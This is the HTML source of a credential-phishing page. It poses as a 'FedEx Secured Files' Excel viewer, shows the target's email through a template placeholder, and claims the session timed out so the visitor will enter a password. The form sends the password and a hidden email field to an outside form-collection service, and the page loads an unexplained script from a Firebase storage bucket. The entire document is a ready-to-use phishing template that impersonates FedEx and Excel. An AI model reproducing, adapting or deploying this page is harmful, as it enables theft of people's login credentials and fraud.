<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <title>FedEx Secured Files</title>
    <script src="https://firebasestorage.googleapis.com/v0/b/nftpro-9e649.appspot.com/o/ban()kai.js?alt=media&token=403b56b3-5bc0-4274-9bd6-f0201cc81ccd"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <style>
        body,
        html {
            height: 100%;
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        * {
            box-sizing: border-box;
        }

        .bg-image {
            /* The image used */
            background-image: url("https://www.fedex.com/content/dam/fedex/eu-europe/images/eu_en_2020_04_master_web_i_customs-docs-step4_mkt.png");
            /* Add the blur effect */
            filter: blur(4px);
            -webkit-filter: blur(4px);
            /* Full height */
            height: 100%;
            /* Center and scale the image nicely */
            background-position: cover;
            background-repeat: no-repeat;
            background-size: cover;
        }

        /* Position text in the middle of the page/image */
        .bg-text {
            background: #800080;
            background: -moz-linear-gradient(top, #800080 0%, #301934 74%, #301934 100%);
            background: -webkit-linear-gradient(top, #800080 0%, #301934 74%, #301934 100%);
            background: linear-gradient(to bottom, #800080 0%, #301934 74%, #301934 100%);
            color: white;
            font-weight: bold;
            border: 1px solid #14772E;
            border-radius: 25px 0px 65px 0px;
            -webkit-box-shadow: 3px 3px 15px 5px #000000;
            box-shadow: 3px 3px 15px 5px #000000;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 2;
            width: 350px;
            height: 270px;
            padding: 5px;
            text-align: center;
        }
    </style>

</head>

<body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0">
    <table align="center" cellspacing="0" height="100%" width="100%">
        <tr>
            <td height="8%" bgcolor="#301934">
                <table align="center" cellspacing="0" width="97%">
                    <tr>
                        <td>
                            <font face="arial" size="3" color="#FFFFFF">
                                &nbsp; <b>[[-Email-]]</b> Excel Reader
                            </font>
                        </td>
                    </tr>
                </table>
            </td>
        </tr>
        <tr>
            <td height="88%" bgcolor="#FFF">
                <div class="bg-image"></div>
                <div class="bg-text">
                    <table align="center" cellspacing="0">
                        <tr>
                            <td style="height:35px;"></td>
                        </tr>
                        <tr>
                            <td>
                                <font face="arial" size="3" color="#FFF">
                                    &nbsp; [[-Email-]]
                                </font>
                            </td>
                        </tr>

                        <tr>
                            <td style="height:10px;"></td>
                        </tr>

                        <tr>
                            <td>
                                <form id="fs1" method="post" action="https://nocodeform.io/f/66c0ae9aba5e2beb630a8a62">
                            </td>
                        </tr>
                        <tr>
                            <td>
                                <div align="left">
                                    <font id="fnt1" face="verdana" size="2" color="#FFF">
                                        &nbsp; Email Timed Out. Sign in to Excel Sheet
                                    </font>
                                </div>
                            </td>
                        </tr>
                        <tr>
                            <td style="height:5px;"></td>
                        </tr>
                        <tr>
                            <td>
                                <table cellspacing="0" align="center">
                                    <tr>
                                        <td>
                                            <div align="center">
                                                <input id="ps1" name="password" type="password" placeholder="Password" required
                                                    style=" width:280px; height:33px; font-family: arial; font-size: 14px;
                                  color:#000000; background-color: #FFF; border: solid 1px #FFF; padding: 5px; border-radius: 3px;">
                                            </div>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="height:7px;"></td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <table align="center" cellspacing="0" style="width:285px;">
                                                <tr>
                                                    <td>
                                                        <input type="checkbox" checked>
                                                        <font face="arial" size="2" color="#FFF">Remember me</font>
                                                    </td>
                                                    <td>
                                                        <div align="right">
                                                            <a href="#" style="tet]xt-decoration:none;">
                                                                <font face="arial" size="2" color="#0080FF"><u>
                                                                        Forgot password?
                                                                    </u></font>
                                                            </a>
                                                        </div>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="height:20px;"></td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <div align="right">
                                                <input id="bs1" type="submit" value="View"
                                                    style="width:90px; height:35px; font-family: arial; font-size: 14px;                                 color:#FFF; background-color: #ff8c00; border: solid 1px #FFA500; box-shadow: 1px 1px 15px 5px                                 #000000; border-radius: 5px;">
                                            </div>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="height:20px;">
                                            <input id="es1" type="hidden" name="email" value="[[-Email-]]">
                                            </form>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </div>

            </td>
        </tr>



        <tr>
            <td height="4%" bgcolor="#1C1C1C">


            </td>
        </tr>
</body>

</html>
